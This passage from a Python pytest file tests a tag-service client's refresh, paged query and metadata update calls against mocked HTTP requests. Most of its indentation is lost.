"collectAggregates": True,
},
{"type": "DOUBLE", "path": path2},
],
}
]
)
)
tag1 = tbase.TagData(path1)
tag2 = tbase.TagData(
path2, tbase.DataType.UINT64, ["dummy"], {"dummy": "dummy"}
)
tag2.set_retention_count(9)
self._uut.refresh([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": path1 + "," + path2, "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tag1.collect_aggregates is True
assert keywords == sorted(tag1.keywords)
assert sorted(public_properties.items()) == sorted(tag1.properties.items())
assert dummy_tag.retention_count == tag1.retention_count
assert dummy_tag.retention_days == tag1.retention_days
assert dummy_tag.retention_type == tag1.retention_type
assert tbase.DataType.DOUBLE == tag2.data_type
assert tag2.collect_aggregates is False
assert 0 == len(tag2.keywords)
assert 0 == len(tag2.properties)
assert tag2.retention_count is None
assert tag2.retention_days is None
assert tbase.RetentionType.NONE == tag2.retention_type
def test__missing_tags_supplied__refresh__missing_tags_ignored(self):
keywords = ["keyword"]
properties = {"prop": "value"}
tag1 = tbase.TagData("existing")
tag2 = tbase.TagData("missing", tbase.DataType.DOUBLE, keywords, properties)
tag2.collect_aggregates = True
tag2.set_retention_days(6)
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": 1, "tags": [{"type": "BOOLEAN", "path": "existing"}]}]
)
)
self._uut.refresh([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "existing,missing", "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tbase.DataType.UNKNOWN == tag2.data_type
assert tag2.collect_aggregates is True
assert keywords == tag2.keywords
assert properties == tag2.properties
assert tag2.retention_count is None
assert 6 == tag2.retention_days
assert tbase.RetentionType.DURATION == tag2.retention_type
@pytest.mark.asyncio
async def test__invalid_tags__refresh_async__raises(self):
with pytest.raises(ValueError):
await self._uut.refresh_async(None)
with pytest.raises(ValueError):
await self._uut.refresh_async([None])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), None])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), tbase.TagData(None)])
with pytest.raises(ValueError):
await self._uut.refresh_async([tbase.TagData("tag"), tbase.TagData("")])
@pytest.mark.asyncio
async def test__multiple_tags_given__refresh_async__all_tags_updated(self):
path1 = "tag1"
path2 = "tag2"
public_properties = {"prop1": "value1", "prop2": "value2"}
all_properties = dict(public_properties)
dummy_tag = tbase.TagData(path1)
dummy_tag.retention_type = tbase.RetentionType.COUNT
dummy_tag.retention_count = 7
dummy_tag.retention_days = 9
dummy_tag._copy_retention_properties(all_properties)
keywords = ["keyword1", "keyword2"]
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": 2,
"tags": [
{
"type": "BOOLEAN",
"properties": all_properties,
"path": path1,
"keywords": keywords,
"collectAggregates": True,
},
{"type": "DOUBLE", "path": path2},
],
}
]
)
)
tag1 = tbase.TagData(path1)
tag2 = tbase.TagData(
path2, tbase.DataType.UINT64, ["dummy"], {"dummy": "dummy"}
)
tag2.set_retention_count(9)
await self._uut.refresh_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": path1 + "," + path2, "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tag1.collect_aggregates is True
assert keywords == sorted(tag1.keywords)
assert sorted(public_properties.items()) == sorted(tag1.properties.items())
assert dummy_tag.retention_count == tag1.retention_count
assert dummy_tag.retention_days == tag1.retention_days
assert dummy_tag.retention_type == tag1.retention_type
assert tbase.DataType.DOUBLE == tag2.data_type
assert tag2.collect_aggregates is False
assert 0 == len(tag2.keywords)
assert 0 == len(tag2.properties)
assert tag2.retention_count is None
assert tag2.retention_days is None
assert tbase.RetentionType.NONE == tag2.retention_type
@pytest.mark.asyncio
async def test__missing_tags_supplied__refresh_async__missing_tags_ignored(self):
keywords = ["keyword"]
properties = {"prop": "value"}
tag1 = tbase.TagData("existing")
tag2 = tbase.TagData("missing", tbase.DataType.DOUBLE, keywords, properties)
tag2.collect_aggregates = True
tag2.set_retention_days(6)
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": 1, "tags": [{"type": "BOOLEAN", "path": "existing"}]}]
)
)
await self._uut.refresh_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "existing,missing", "take": "2"}
)
assert tbase.DataType.BOOLEAN == tag1.data_type
assert tbase.DataType.UNKNOWN == tag2.data_type
assert tag2.collect_aggregates is True
assert keywords == tag2.keywords
assert properties == tag2.properties
assert tag2.retention_count is None
assert 6 == tag2.retention_days
assert tbase.RetentionType.DURATION == tag2.retention_type
def test__bad_arguments__query__raises(self):
with pytest.raises(ValueError):
self._uut.query(skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(skip=0, take=-1)
with pytest.raises(ValueError):
self._uut.query([])
with pytest.raises(ValueError):
self._uut.query(["tag", None])
with pytest.raises(ValueError):
self._uut.query(["tag", ""])
with pytest.raises(ValueError):
self._uut.query(["tag", " "])
with pytest.raises(ValueError):
self._uut.query([], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", None], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], skip=0, take=-1)
with pytest.raises(ValueError):
self._uut.query(["tag", None], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], None, None)
with pytest.raises(ValueError):
self._uut.query(["tag", None], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", ""], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag", " "], None, None, skip=0, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], None, None, skip=-1, take=0)
with pytest.raises(ValueError):
self._uut.query(["tag"], None, None, skip=0, take=-1)
def test__only_skip_and_take_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(skip=2, take=1)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}),
mock.call("GET", "/nitag/v2/tags", params={"skip": "3", "take": "1"}),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
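
# The call_args_list above shows how paging works: each subsequent page re-issues the
# same GET with `skip` advanced by `take`, stopping once `skip` reaches the totalCount
# reported by the first response. The same idea in isolation (hypothetical `request`
# helper, not the client's implementation):
def _iter_pages_sketch(request, skip, take, total_count):
    while skip < total_count:
        yield request("GET", "/nitag/v2/tags",
                      params={"skip": str(skip), "take": str(take)})
        skip += take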
def test__only_paths_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"totalCount": 0, "tags": []}])
)
result = self._uut.query(["tag1", "tag2"])
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "tag1,tag2", "skip": "0"}
)
def test__path_with_skip_and_take_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(
["missing1", path1, "missing2", path2, "missing3"], skip=2, take=1
)
assert total_count == result.total_count
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": paths, "skip": "2", "take": "1"}
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "2", "take": "1"},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "3", "take": "1"},
),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
def test__paths_with_keywords_and_properties_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = self._uut.query(
["tag1", "tag2"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": "tag1,tag2",
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
def test__only_keywords_and_properties_supplied__query__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = self._uut.query(
None,
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
def test__all_inputs_supplied__query__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = self._uut.query(
["missing1", path1, "missing2", path2, "missing3"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
skip=2,
take=1,
)
assert total_count == result.total_count
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
)
pages = list(result)
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "3",
"take": "1",
},
),
]
assert 2 == len(pages)
assert 1 == len(pages[0])
assert path1 == pages[0][0].path
assert tbase.DataType.BOOLEAN == pages[0][0].data_type
assert 1 == len(pages[1])
assert path2 == pages[1][0].path
assert tbase.DataType.DATE_TIME == pages[1][0].data_type
@pytest.mark.asyncio
async def test__bad_arguments__query_async__raises(self):
with pytest.raises(ValueError):
await self._uut.query_async(skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(skip=0, take=-1)
with pytest.raises(ValueError):
await self._uut.query_async([])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""])
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "])
with pytest.raises(ValueError):
await self._uut.query_async([], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], skip=0, take=-1)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], None, None)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", None], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", ""], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag", " "], None, None, skip=0, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], None, None, skip=-1, take=0)
with pytest.raises(ValueError):
await self._uut.query_async(["tag"], None, None, skip=0, take=-1)
@pytest.mark.asyncio
async def test__only_skip_and_take_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(skip=2, take=1)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags", params={"skip": "2", "take": "1"}),
mock.call("GET", "/nitag/v2/tags", params={"skip": "3", "take": "1"}),
]
await result.move_next_page_async()
assert result.current_page is None
@pytest.mark.asyncio
async def test__only_paths_supplied__query_async__performs_query(self):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([{"totalCount": 0, "tags": []}])
)
result = await self._uut.query_async(["tag1", "tag2"])
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": "tag1,tag2", "skip": "0"}
)
@pytest.mark.asyncio
async def test__path_with_skip_and_take_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(
["missing1", path1, "missing2", path2, "missing3"], skip=2, take=1
)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags", params={"path": paths, "skip": "2", "take": "1"}
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "2", "take": "1"},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={"path": paths, "skip": "3", "take": "1"},
),
]
await result.move_next_page_async()
assert result.current_page is None
@pytest.mark.asyncio
async def test__paths_with_keywords_and_properties_supplied__query_async__performs_query(
self,
):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = await self._uut.query_async(
["tag1", "tag2"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": "tag1,tag2",
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
@pytest.mark.asyncio
async def test__only_keywords_and_properties_supplied__query_async__performs_query(
self,
):
total_count = 0
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"totalCount": total_count, "tags": []}]
)
)
result = await self._uut.query_async(
None,
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
)
assert total_count == result.total_count
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "0",
},
)
@pytest.mark.asyncio
async def test__all_inputs_supplied__query_async__performs_query(self):
total_count = 4
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"totalCount": total_count,
"tags": [{"type": "BOOLEAN", "path": path1}],
},
{
"totalCount": total_count,
"tags": [{"type": "DATE_TIME", "path": path2}],
},
]
)
)
result = await self._uut.query_async(
["missing1", path1, "missing2", path2, "missing3"],
["keyword1", "keyword2"],
OrderedDict((("prop1", "value1"), ("prop2", "value2"))),
skip=2,
take=1,
)
assert total_count == result.total_count
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path1 == result.current_page[0].path
assert tbase.DataType.BOOLEAN == result.current_page[0].data_type
paths = ",".join(("missing1", path1, "missing2", path2, "missing3"))
self._client.all_requests.assert_called_once_with(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
)
await result.move_next_page_async()
assert result.current_page is not None
assert 1 == len(result.current_page)
assert path2 == result.current_page[0].path
assert tbase.DataType.DATE_TIME == result.current_page[0].data_type
assert self._client.all_requests.call_args_list == [
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "2",
"take": "1",
},
),
mock.call(
"GET",
"/nitag/v2/tags",
params={
"path": paths,
"keywords": "keyword1,keyword2",
"properties": "prop1=value1,prop2=value2",
"skip": "3",
"take": "1",
},
),
]
await result.move_next_page_async()
assert result.current_page is None
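    # The update tests below distinguish the two overloads: a list of TagData
    # performs a full metadata replace (merge=False), while a list of
    # TagDataUpdate performs a metadata merge (merge=True).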
def test__bad_arguments__update_with_tags__raises(self):
valid_tag = tbase.TagData("tag", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
self._uut.update(None)
with pytest.raises(ValueError):
self._uut.update([])
with pytest.raises(ValueError):
self._uut.update([valid_tag, None])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData(None, tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData("", tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData(" ", tbase.DataType.BOOLEAN)])
with pytest.raises(ValueError):
self._uut.update([valid_tag, tbase.TagData("tag2", tbase.DataType.UNKNOWN)])
def test__update_with_tags__metadata_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties1 = dict(properties)
tag1._copy_retention_properties(all_properties1)
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
self._uut.update([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{
"path": path1,
"type": "BOOLEAN",
"keywords": keywords,
"properties": all_properties1,
"collectAggregates": False,
},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": False,
},
)
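    # Partial-success responses carry a structured error payload; the tests
    # below expect the client to surface it as an ApiException whose error,
    # including the per-tag innerErrors, mirrors the server response.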
def test__partial_success__update_with_tags__raises(self):
path = "invalid"
error = core.ApiError()
error.name = "Tag.OneOrMoreErrorsOccurred"
error.message = "One or more errors occurred"
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = "Tag.InvalidDataType"
inner_errors[0].message = "Invalid data type"
inner_errors[0].resource_type = "tag"
inner_errors[0].resource_id = path
inner_errors[1].name = "Tag.Conflict"
inner_errors[1].message = "Conflict of some sort"
inner_errors[1].resource_type = "tag"
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.update([tbase.TagData(path, tbase.DataType.BOOLEAN)])
assert error == ex.value.error
def test__bad_arguments__update_with_tag_updates__raises(self):
validUpdate = tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag", tbase.DataType.BOOLEAN), tbase.TagUpdateFields.ALL
)
with pytest.raises(ValueError):
self._uut.update(None)
with pytest.raises(ValueError):
self._uut.update([])
with pytest.raises(ValueError):
self._uut.update([validUpdate, None])
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(None, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(" ", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
self._uut.update(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag2", tbase.DataType.UNKNOWN),
tbase.TagUpdateFields.ALL,
),
]
)
def test__update_with_tag_update__metadata_merge_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
self._uut.update(
[
tbase.TagDataUpdate.from_tagdata(
tag1, tbase.TagUpdateFields.PROPERTIES
),
tbase.TagDataUpdate.from_tagdata(tag2, tbase.TagUpdateFields.ALL),
]
)
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{"path": path1, "type": "BOOLEAN", "properties": properties},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": True,
},
)
def test__partial_success__update_with_tag_updates__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
self._uut.update(
[
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(path, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
)
]
)
assert error == ex.value.error
@pytest.mark.asyncio
async def test__bad_arguments__update_async_with_tags__raises(self):
valid_tag = tbase.TagData("tag", tbase.DataType.BOOLEAN)
with pytest.raises(ValueError):
await self._uut.update_async(None)
with pytest.raises(ValueError):
await self._uut.update_async([])
with pytest.raises(ValueError):
await self._uut.update_async([valid_tag, None])
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData(None, tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData("", tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData(" ", tbase.DataType.BOOLEAN)]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[valid_tag, tbase.TagData("tag2", tbase.DataType.UNKNOWN)]
)
@pytest.mark.asyncio
async def test__update_async_with_tags__metadata_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
all_properties1 = dict(properties)
tag1._copy_retention_properties(all_properties1)
all_properties2 = {}
tag2._copy_retention_properties(all_properties2)
await self._uut.update_async([tag1, tag2])
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-tags",
params=None,
data={
"tags": [
{
"path": path1,
"type": "BOOLEAN",
"keywords": keywords,
"properties": all_properties1,
"collectAggregates": False,
},
{
"path": path2,
"type": "STRING",
"properties": all_properties2,
"collectAggregates": True,
},
],
"merge": False,
},
)
@pytest.mark.asyncio
async def test__partial_success__update_async_with_tags__raises(self):
path = "invalid"
error = core.ApiError()
error.name = ("Tag.OneOrMoreErrorsOccurred",)
error.message = ("One or more errors occurred",)
inner_errors = [core.ApiError(), core.ApiError()]
inner_errors[0].name = ("Tag.InvalidDataType",)
inner_errors[0].message = ("Invalid data type",)
inner_errors[0].resource_type = ("tag",)
inner_errors[0].resource_id = path
inner_errors[1].name = ("Tag.Conflict",)
inner_errors[1].message = ("Conflict of some sort",)
inner_errors[1].resource_type = ("tag",)
inner_errors[1].resource_id = "another"
error.inner_errors = inner_errors
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"error": {
"name": error.name,
"message": error.message,
"innerErrors": [
{
"name": error.inner_errors[0].name,
"message": error.inner_errors[0].message,
"resourceType": error.inner_errors[0].resource_type,
"resourceId": error.inner_errors[0].resource_id,
},
{
"name": error.inner_errors[1].name,
"message": error.inner_errors[1].message,
"resourceType": error.inner_errors[1].resource_type,
"resourceId": error.inner_errors[1].resource_id,
},
],
}
}
]
)
)
with pytest.raises(core.ApiException) as ex:
await self._uut.update_async([tbase.TagData(path, tbase.DataType.BOOLEAN)])
assert error == ex.value.error
@pytest.mark.asyncio
async def test__bad_arguments__update_async_with_tag_updates__raises(self):
validUpdate = tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag", tbase.DataType.BOOLEAN), tbase.TagUpdateFields.ALL
)
with pytest.raises(ValueError):
await self._uut.update_async(None)
with pytest.raises(ValueError):
await self._uut.update_async([])
with pytest.raises(ValueError):
await self._uut.update_async([validUpdate, None])
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(None, tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData(" ", tbase.DataType.BOOLEAN),
tbase.TagUpdateFields.ALL,
),
]
)
with pytest.raises(ValueError):
await self._uut.update_async(
[
validUpdate,
tbase.TagDataUpdate.from_tagdata(
tbase.TagData("tag2", tbase.DataType.UNKNOWN),
tbase.TagUpdateFields.ALL,
),
]
)
@pytest.mark.asyncio
async def test__update_async_with_tag_update__metadata_merge_sent_to_server(self):
path1 = "tag1"
path2 = "tag2"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
keywords = ["keyword1", "keyword2"]
properties = {"prop1": "value1", "prop2": "value2"}
tag1 = tbase.TagData(path1, tbase.DataType.BOOLEAN, keywords, properties)
tag1.set_retention_days(1)
tag2 = tbase.TagData(path2, tbase.DataType.STRING)
tag2.collect_aggregates = True
